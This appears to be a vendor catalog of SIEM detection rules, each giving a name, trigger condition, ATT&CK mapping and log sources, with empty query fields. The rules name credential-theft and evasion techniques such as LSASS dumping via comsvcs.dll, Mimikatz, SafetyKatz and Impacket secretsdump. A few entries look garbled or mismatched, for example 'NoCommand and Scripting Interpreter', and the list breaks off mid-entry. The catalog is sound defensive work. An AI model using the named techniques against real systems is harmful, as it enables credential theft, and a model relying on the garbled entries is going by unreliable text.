Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious InstallUtil Execution
Trigger Condition: Manipulation of InstallUtil to execute proxy code via a trusted Windows utility. InstallUtil is a command-line utility that allows resource installation and uninstallation by executing specific installer components specified in .NET binaries.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, InstallUtil
ATT&CK ID: T1218, T1218.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Java Running with Remote Debugging
Trigger Condition: Operation of a JAVA process with remote debugging, allowing more than one local host to connect. Adversaries may abuse its functionality to execute arbitrary code on remote systems.
ATT&CK Category: Execution
ATT&CK Tag: Exploitation for Client Execution
ATT&CK ID: T1203
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_JunOS Attack
Trigger Condition: Logpoint detects an attack pattern.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1498, T1499
Minimum Log Source Requirement: JunOS
Query:
LP_JunOS Authentication Failed
Trigger Condition: Failure of an authentication.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Brute Force
ATT&CK ID: T1078, T1110
Minimum Log Source Requirement: JunOS
Query:
LP_JunOS Policy Violation
Trigger Condition: A policy violation is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation, Credential Access
ATT&CK Tag: Bypass User Access Control, Exploitation for Credential Access, Exploitation for Privilege Escalation
ATT&CK ID: T1548, T1212, T1068
Minimum Log Source Requirement: JunOS
Query:
LP_JunOS Security Log Clear
Trigger Condition: An administrator has cleared one or more audit logs.
ATT&CK Category: Defense Evasion, Impact
ATT&CK Tag: Indicator Removal on Host, Data Destruction, Indicator Removal on Host, File Deletion
ATT&CK ID: T1070, T1485, T1070, T1070.004
Minimum Log Source Requirement: JunOS
Query:
LP_Kaspersky Antivirus - Outbreak Detection
Trigger Condition: This alert rule is triggered whenever a threat is detected.
ATT&CK Category: Impact
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus - Update Fail
Trigger Condition: Automatic updates are disabled, not all the components are updated, or there is a network error.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Extremely Out of Date Event
Trigger Condition: Outdated events are detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Outbreak Detection by Source
Trigger Condition: More than one source is affected by the same virus.
ATT&CK Category: Impact
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Outbreak Detection by Virus
Trigger Condition: More than ten viruses are detected in the system.
ATT&CK Category: Impact
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kaspersky Antivirus Threat Affecting Multiple Host
Trigger Condition: The same threat is detected in multiple hosts.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Kaspersky
Query:
LP_Kernel Firewall Connection Denied
Trigger Condition: Ten firewall connections are denied from the same source to the same destination in a minute.
ATT&CK Category: Impact, Command and Control
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service, Proxy
ATT&CK ID: T1498, T1499, T1090
Minimum Log Source Requirement: Kernel
Query:
LP_Koadic Execution Detected
Trigger Condition: Use of command line parameters associated with the Koadic hack tool during process creation events in Windows systems.
ATT&CK Category: Execution
ATT&CK Tag: Windows Command Shell, Visual Basic, JavaScript
ATT&CK ID: T1059.003, T1059.005, T1059.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Local Account Creation on Workstation Detected
Trigger Condition: This alert is triggered whenever a local account creation on a domain workstation that is not a DC is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Create Account
ATT&CK ID: T1136
Minimum Log Source Requirement: Windows
Query:
LP_LockCrypt Ransomware
Trigger Condition: LockCrypt ransomware encrypts a file.
ATT&CK Category: Impact
ATT&CK Tag: Disk Wipe, Disk Content Wipe, Data Encrypted for Impact, Data Destruction
ATT&CK ID: T1561, T1561.001, T1486, T1485
Minimum Log Source Requirement: Integrity Scanner
Query:
LP_Log Files Creation of Dot-Net-to-JS Detected
Trigger Condition: This alert is triggered whenever creation of log files of Dot-Net-to-JavaScript is detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malicious Base64 Encoded PowerShell Keywords in Command Lines Detected
Trigger Condition: When base64 encoded strings are used in hidden malicious Command and Scripting Interpreter, PowerShell command lines. Adversaries hides their activities by encoding commands to bypass detection with this technique.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious Service Installations Detected
Trigger Condition: Installation of malicious services. Adversaries install such services for lateral movement, credential dumping, and other suspicious activity.
ATT&CK Category: Execution
ATT&CK Tag: Service Execution
ATT&CK ID: T1569.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Malware Threat Connection from Malicious Source
Trigger Condition: Inbound connection from malicious sources is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Malware Threat Connection to Malicious URLs
Trigger Condition: A connection to a malicious URL is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Malware Threat Emails Sent to Attacker
Trigger Condition: Email is sent to malware listed emails.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy, Exfiltration Over C2 Channel, Automated Exfiltration, Email Collection
ATT&CK ID: T1090, T1041, T1020, T1114
Minimum Log Source Requirement: Mail Server
Query:
LP_Meltdown and Spectre Vulnerabilities
Trigger Condition: Meltdown and Spectre vulnerabilities are detected in the system.
ATT&CK Category: Discovery
ATT&CK Tag: Software Discovery, Security Software Discovery
ATT&CK ID: T1518, T1518.001
Minimum Log Source Requirement: Vulnerability Management
Query:
LP_Meterpreter or Cobalt Strike Getsystem Service Start Detected
Trigger Condition: This alert is triggered whenever it detects the use of getsystem Meterpreter/Cobalt Strike command to obtain SYSTEM privileges by detecting a specific service starting.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Token Impersonation/Theft, Create Process with Token
ATT&CK ID: T1134.001, T1134.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Microsoft Office Memory Corruption Vulnerability CVE-2017-11882 Detected
Trigger Condition: The exploitation of memory corruption vulnerability (CVE-2017-11882) in Microsoft Office is detected.
ATT&CK Category: Execution
ATT&CK Tag: User Execution
ATT&CK ID: T1204
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Mimikatz Command Line Detected
Trigger Condition: This alert is triggered whenever well-known mimikatz command line arguments are detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory, Security Account Manager, LSA Secrets, Cached Domain Credentials, DCSync
ATT&CK ID: T1003, T1003.001, T1003.002, T1003.003, T1003.004, T1003.005, T1003.006
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Mitre Discovery Using Query Registry Detected
Trigger Condition: Discovery uses the attack technique Query Registry.
ATT&CK Category: Discovery
ATT&CK Tag: Query Registry
ATT&CK ID: T1012
Minimum Log Source Requirement: Windows
Query:
LP_Mitre Discovery Using System Network Configuration Discovery Detected
Trigger Condition: Discovery uses the attack technique System Network Configuration Discovery.
ATT&CK Category: Discovery
ATT&CK Tag: System Network Configuration Discovery
ATT&CK ID: T1016
Minimum Log Source Requirement: Windows
Query:
LP_Mitre Persistence via Winlogon Helper DLL Detected
Trigger Condition: Modifications in Winlogon registry keys are detected.
ATT&CK Category: Execution
ATT&CK Tag: Boot or Logon Autostart Execution, Winlogon Helper DLL
ATT&CK ID: T1547, T1547.004
Minimum Log Source Requirement: Windows
Query:
LP_MMC Spawning Windows Shell Detected
Trigger Condition: Windows command line executable starting from MMC is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Distributed Component Object Model
ATT&CK ID: T1021.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Most Exploitable Vulnerabilities Detected
Trigger Condition: The most exploitable vulnerabilities from 2015 are detected in a network. For this alert to work, MOST_EXPLOITABLE_CVE must be updated with the list of exploitable vulnerabilities.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning, Software Discovery, Security Software Discovery
ATT&CK ID: T1046, T1518, T1518.001
Minimum Log Source Requirement: Vulnerability Management
Query:
LP_Mshta JavaScript Execution Detected
Trigger Condition: The mshta.exe command is detected.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Signed Binary Proxy Execution, Mshta
ATT&CK ID: T1218, T1218.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_MSHTA Spawning Windows Shell Detected
Trigger Condition: Windows command line executable started from MSHTA is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Mshta
ATT&CK ID: T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_MSHTA Suspicious Execution Detected
Trigger Condition: mshta.exe suspicious execution patterns sometimes involving file polyglotism is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Deobfuscate/Decode Files or Information
ATT&CK ID: T1140
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_MSTSC Shadowing Detected
Trigger Condition: This alert is triggered whenever it detects RDP session hijacking by using MSTSC (Microsoft Terminal Services Client) shadowing.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Service Session Hijacking, RDP Hijacking
ATT&CK ID: T1563, T1563.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Multiple Failed Login Followed by Successful Login Followed by Logoff
Trigger Condition: Multiple failed login attempts are followed by successful login, and then by log off from the same user are detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access, Credential Access
ATT&CK Tag: Valid Accounts, Brute Force
ATT&CK ID: T1078, T1110
Minimum Log Source Requirement: Windows
Query:
LP_Named Pipe added to Null Session Detected
Trigger Condition: A new value set for the NullSessionPipe registry key is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services
ATT&CK ID: T1021
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Narrators Feedback-Hub Persistence Detected
Trigger Condition: Attempt made to abuse Windows 10 Narrator’s Feedback-Hub.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Boot or Logon Autostart Execution, Registry Run Keys/Startup Folder
ATT&CK ID: T1547, T1547.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Net exe Execution Detected
Trigger Condition: The execution of Net.exe, which can be suspicious or benign, is detected.
ATT&CK Category: Lateral Movement, Discovery, Defense Evasion
ATT&CK Tag: Obfuscated Files or Information, System Network Connections Discovery, Remote Services, Network Share Discovery
ATT&CK ID: T1027, T1049, T1021, T1135
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_NetNTLM Downgrade Attack Detected
Trigger Condition: Post exploitation using NetNTLM downgrade attacks.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools, Modify Registry
ATT&CK ID: T1562, T1562.001, T1112
Minimum Log Source Requirement: Windows
Query:
LP_Network Share Connection Removed
Trigger Condition: This alert is triggered whenever it detects the removal of the share connection. A network share is a shared folder or directory on a network that allows multiple users to access and share files or resources. Adversaries may use network shares to gain unauthorized access to sensitive data or resources on a network or distribute their malware. After finishing their operation, they may remove share connections that are no longer useful in order to clean up traces of their operation.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Network Share Connection Removal
ATT&CK ID: T1070.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Network Sniffing Detected
Trigger Condition: This alert is triggered whenever the execution of network sniffing tools is detected.
ATT&CK Category: Credential Access, Discovery
ATT&CK Tag: Network Sniffing
ATT&CK ID: T1040
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_New Firewall Port Opening Detected
Trigger Condition: An opening of a new port in a firewall is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Non-Standard Port
ATT&CK ID: T1571
Minimum Log Source Requirement: Windows
Query:
LP_New RUN Key Pointing to Suspicious Folder Detected
Trigger Condition: A new suspicious RUN key element pointing to an executable in a folder is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, Registry Run Keys/Startup Folder
ATT&CK ID: T1547, T1547.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_New Service Creation
Trigger Condition: This alert is triggered whenever it detects creation of a new service. Windows Services can allow creation and management of long running processes.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Create or Modify System Process, Windows Service
ATT&CK ID: T1543, T1543.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_NoPowerShell Tool Activity Detected
Trigger Condition: This alert is triggered whenever execution of NoCommand and Scripting Interpreter, PowerShell tool is detected.
ATT&CK Category: Execution
ATT&CK Tag: Shared Modules
ATT&CK ID: T1129
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Office365 Multiple Failed Login from Different Host by Single User
Trigger Condition: A user attempts multiple failed logins from distinct hosts with a count greater than one.
ATT&CK Category: Credential Access, Persistence, Defense Evasion, Privilege Escalation, Initial Access
ATT&CK Tag: Brute Force, Valid Accounts
ATT&CK ID: T1110, T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Multiple Failed Login from Same Host
Trigger Condition: Multiple failed logins from the same host with a count greater than five.
ATT&CK Category: Credential Access, Persistence, Defense Evasion, Privilege Escalation, Initial Access
ATT&CK Tag: Brute Force, Valid Accounts
ATT&CK ID: T1110, T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Multiple Successful Login from Different Country by Single User
Trigger Condition: A user attempts multiple failed logins from different countries with a count greater than one.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Multiple Successful Login From Different Host by Single User
Trigger Condition: A user attempts multiple successful logins from a distinct host with a count greater than one.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Office365
Query:
LP_Office365 Password Resets
Trigger Condition: A user’s password is reset.
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation
ATT&CK ID: T1098
Minimum Log Source Requirement: Office365
Query:
LP_OpenWith Execution of Specified Binary Detected
Trigger Condition: The execution of OpenWith.exe with command line argument “-c” or “/c” is detected.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Password Change on DSRM Account Detected
Trigger Condition: Password change in Directory Service Restore Mode (DSRM) account is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Account Manipulation
ATT&CK ID: T1098
Minimum Log Source Requirement: Windows
Query:
LP_Password Dumper Remote Thread in LSASS
Trigger Condition: This alert is triggered whenever it detects password dumper activity in LSASS.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Password Spraying Attack Detected
Trigger Condition: Multiple login fail attempts on a host by various users are detected. Adversaries can use a list of commonly used passwords against different versions to attempt to obtain valid account credentials.
ATT&CK Category: Credential Access
ATT&CK Tag: Password Spraying
ATT&CK ID: T1110.003
Minimum Log Source Requirement: Windows
Query:
LP_Persistence and Execution at Scale via GPO Scheduled Task
Trigger Condition: Attempt to access the SYSVOL share, explicitly targeting the ScheduleTasks.xml file with writeData permissions. SYSVOL is a critical directory on Windows domain controllers that stores domain-wide data, including Group Policy objects.
ATT&CK Category: Persistence, Execution, Privilege Escalation
ATT&CK Tag: Scheduled Task/Job, Scheduled Task
ATT&CK ID: T1053, T1053.005
Minimum Log Source Requirement: Windows
Query:
LP_Possible Account Misuse-Privilege Escalation
Trigger Condition: Non-admin users are assigned privileged access. The event maps to event ID of 4648 and 4672 in Windows.
ATT&CK Category: Privilege Escalation, Persistence, Defense Evasion
ATT&CK Tag: Account Manipulation, Abuse Elevation Control Mechanism, Bypass User Account Control
Minimum Log Source Requirement: Windows
Query:
LP_Possible Applocker Bypass Detected
Trigger Condition: This alert is triggered whenever it detects the execution of potentially suspicious executables capable of bypassing AppLocker whitelisting.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, Mshta, InstallUtil, Regsvcs/Regasm, Trusted Developer Utilities, MSBuild
ATT&CK ID: T1218, T1218.004, T1218.009, T1127, T1218.005, T1127.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_File Download via Bitsadmin Detected
Trigger Condition: Use of bitsadmin to download a file.
ATT&CK Category: Defense Evasion, Persistence
ATT&CK Tag: BITS Jobs
ATT&CK ID: T1197
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Botnet Connection-DNS Server Modified
Trigger Condition: An unauthorized default Application Layer Protocol and DNS server modification are detected in Unix or Windows Server.
ATT&CK Category: Impact, Command and Control, Defense Evasion
ATT&CK Tag: Network Denial of Service, Proxy, Exploitation for Defense Evasion
ATT&CK ID: T1498, T1090, T1211
Minimum Log Source Requirement: Windows
Query:
LP_Possible CLR DLL Loaded Via Office Applications
Trigger Condition: This alert is triggered whenever it detects CLR DLL being loaded by an Office Product like Winword, PowerPoint, Excel, or Outlook.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Dumping Tools Named Pipes Detected
Trigger Condition: This alert is triggered whenever it detects well-known credential dumping tools execution via specific named pipes like lsadump,cachedump,wceservicepipe,etc.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible Data Breach-Off Hour Transfer
Trigger Condition: Unauthorized transfer of sensitive data during off-hours is detected.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Possible DDOS Attack
Trigger Condition: A considerable number of inbound traffic within a short period is detected.
ATT&CK Category: Initial Access, Impact
ATT&CK Tag: Exploit Public-Facing Application, Network Denial of Service
ATT&CK ID: T1190, T1498
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Possible Detection of SafetyKatz
Trigger Condition: SafetyKatz behavior where a temp file debug.bin is created in temp folder to dump credentials using lsass.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible DNS Rebinding Detected
Trigger Condition: Different DNS answers by one domain with IPs from internal and external networks are detected. Typically, DNS-answer contains TTL greater than 100. Application Layer Protocol and DNS-record are saved in the host cache during TTL.
ATT&CK Category: Command and Control
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible Empire Monkey Detected
Trigger Condition: This alert is triggered whenever it detects the execution of a specific command line sequence using the cutil.exe or regsvr32.exe tools. Empire Monkey is an advanced persistent threat (APT) group that has been involved in cyber espionage activities.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Regsvr32
ATT&CK ID: T1059.001, T1218.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Impacket SecretDump Remote Activity
Trigger Condition: Logpoint detects share_nameAD credential dumping using impacket secretdump HKTL.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_Possible Inbound Spamming Detected
Trigger Condition: Logpoint detects possible inbound spam.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Mail Server
Query:
LP_Possible Insider Threat
Trigger Condition: Logpoint detects alerts like privilege escalation, unauthorized access, and data breach for the same user.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Logpoint
Query:
LP_Malicious Payload Download via Office Binaries
Trigger Condition: This alert is triggered whenever an arbitrary file is downloaded using Microsoft Office binaries.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_PowerShell Script Execution from Suspicious Location
Trigger Condition: Suspicious command line that invokes PowerShell from a suspicious location.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows, PowerShell
Query:
LP_Possible Malware Detected
Trigger Condition: A file or software is detected as worm, virus, trojan, or malware.
Minimum Log Source Requirement: Antivirus
Query:
LP_Possible Modification of Boot Configuration
Trigger Condition: Use of the bcdedit command to delete or modify Boot Configuration Data. Boot Configuration Data (BCD) files provide a store that describes boot applications and application settings. Boot configuration data edit (bcdedit) allows manipulation of BCD. This tactic is used by malware or attackers to prevent system recovery. Legitimate usage can trigger this alert. We recommend including legitimate users in the EXCLUDED_USERS list.
ATT&CK Category: Impact, Defense Evasion, Persistence
ATT&CK Tag: Inhibit System Recovery, Pre-OS Boot, Bootkit
ATT&CK ID: T1490, T1542, T1542.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Outbound Spamming Detected
Trigger Condition: Mail received or sent to domains not included in the KNOWN_DOMAINS list is detected. The KNOWN_DOMAINS lists need to be updated with the domains known to communicate to and from the organization.
Minimum Log Source Requirement: Mail Server
Query:
LP_Possible Pass the Hash Activity Detected
Trigger Condition: When the attack technique passes the hash, which is used to move laterally inside the network. Pass the hash is a method of authenticating to a system using a password hash rather than the actual password. Adversaries may use this technique to gain unauthorized access to a system, bypassing normal authentication controls. Pass the hash attacks can be challenging to detect and prevent, as they do not involve using a clear-text password.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Use Alternate Authentication Material, Pass the Hash
ATT&CK ID: T1550, T1550.002
Minimum Log Source Requirement: Windows
Query:
LP_Possible Privilege Escalation via Weak Service Permissions
Trigger Condition: The sc.exe utility spawning by a user with medium integrity level to change the service ImagePath or FailureCommand is detected.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Access Token Manipulation
ATT&CK ID: T1134
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible Process Hollowing Image Loading
Trigger Condition: Loading of samlib.dll or WinSCard.dll from untypical process is detected. For example, through process hollowing by Mimikatz.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading, Process Injection, Process Hollowing
ATT&CK ID: T1574, T1574.002, T1055, T1055.012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible SPN Enumeration Detected
Trigger Condition: Service Principal Name Enumeration used for Steal or Forge Kerberos Tickets and Kerberoasting is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Taskmgr run as LOCAL_SYSTEM Detected
Trigger Condition: This alert is triggered whenever it detects the creation of taskmgr.exe process in the context of LOCAL_SYSTEM.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_PowerShell Base64 Encoded Shellcode Detected
Trigger Condition: Potential Base64 encoded shellcode for PowerShell memory injection is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_PowerShell Network Connections Detected
Trigger Condition: Logpoint detects a Command and Scripting Interpreter and PowerShell process that opens network connections. We recommend you check suspicious target ports and systems, and adjust them according to your environment. For example, extend filters with the company’s IP range.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_PowerShell Profile Modification
Trigger Condition: Modification of a PowerShell profile using the Write-Output or Add-Content command.
ATT&CK Category: Persistence, Privilege Escalation, Execution
ATT&CK Tag: Command and Scripting Interpreter, Event Triggered Execution, PowerShell Profile, Powershell
ATT&CK ID: T1546, T1546.013, T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_PowerShell Version Downgrade Detected
Trigger Condition: Execution of legacy PowerShell version 2.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Command and Scripting Interpreter, PowerShell, Downgrade Attack
ATT&CK ID: T1059, T1059.001, T1562.010
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Process Dump via Comsvcs DLL Detected
Trigger Condition: Process memory dump via comsvcs.dll and rundll32 is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Dump via Rundll32 and Comsvcs Detected
Trigger Condition: Process memory dump performed via ordinal function 24 in comsvcs.dll is detected.
ATT&CK Category: Defense Evasion, Credential Access
ATT&CK Tag: Masquerading, OS Credential Dumping, LSASS Memory
ATT&CK ID: T1036, T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Hollowing Detected
Trigger Condition: This alert is triggered whenever process hollowing is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection, Process Hollowing
ATT&CK ID: T1055, T1055.012
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Injection Detected
Trigger Condition: Adversaries injects code into processes to evade process-based defenses and possibly elevate privileges using commands like Invoke-DllInjection.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Protected Storage Service Access Detected
Trigger Condition: An access to a protected_storage service over the network is detected. The potential abuse of DPAPI to extract domain backup keys from Domain Controllers.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services
ATT&CK ID: T1021
Minimum Log Source Requirement: Windows
Query:
LP_Psr Capture Screenshots Detected
Trigger Condition: This alert is triggered when psr utility is used by adversaries to take screen captures of the desktop to gather information over the course of an operation.
ATT&CK Category: Collection
ATT&CK Tag: Screen Capture
ATT&CK ID: T1113
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Query Registry Network
Trigger Condition: Adversaries uses reg.exe component for network connection and interact with the Windows Registry to gather information about the system, configuration, and installed software.
ATT&CK Category: Discovery
ATT&CK Tag: Query Registry
ATT&CK ID: T1012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Rare Scheduled Task Creations Detected
Trigger Condition: Rare scheduled task creations are detected. A software gets installed on multiple systems. The aggregation and count function selects tasks with rare names.
ATT&CK Category: Persistence
ATT&CK Tag: Scheduled Task/Job, Scheduled Task
ATT&CK ID: T1053, T1053.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RDP Login from Localhost Detected
Trigger Condition: RDP login with a localhost source address that may be a tunneled login is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services, Remote Desktop Protocol
ATT&CK ID: T1021, T1021.001
Minimum Log Source Requirement: Windows
Query:
LP_RDP Over Reverse SSH Tunnel Detected
Trigger Condition: svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 is detected.
ATT&CK Category: Lateral Movement, Command and Control
ATT&CK Tag: Remote Services, Remote Desktop Protocol, Protocol Tunneling
ATT&CK ID: T1021, T1021.001, T1572
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RDP Registry Modification
Trigger Condition: This alert is triggered whenever remote desktop protocol (RDP) registry keys are modify to enable RDP.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RDP Sensitive Settings Changed
Trigger Condition: Changes registry keys related to RDP terminal service are detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Reconnaissance Activity with Net Command
Trigger Condition: A set of commands often used in recon stages by different attack groups to discover the victim’s information, systems, or network are detected.
ATT&CK Category: Discovery, Reconnaissance
ATT&CK Tag: Account Discovery, System Information Discovery, Gather Victim Host Information, Gather Victim Identity Information
ATT&CK ID: T1087, T1082, T1589, T1592
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RedSocks Backdoor Connection
Trigger Condition: A backdoor event is detected. Adversaries develops malware and malware components as backdoors, which are used during targeting.
ATT&CK Category: Resource Development
ATT&CK Tag: Develop Capabilities, Malware
ATT&CK ID: T1587, T1587.001
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Bad Neighborhood Detection
Trigger Condition: A bad neighborhood is detected where adversaries use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a Command and Control server to avoid direct connections to their infrastructure.
ATT&CK Category: Impact
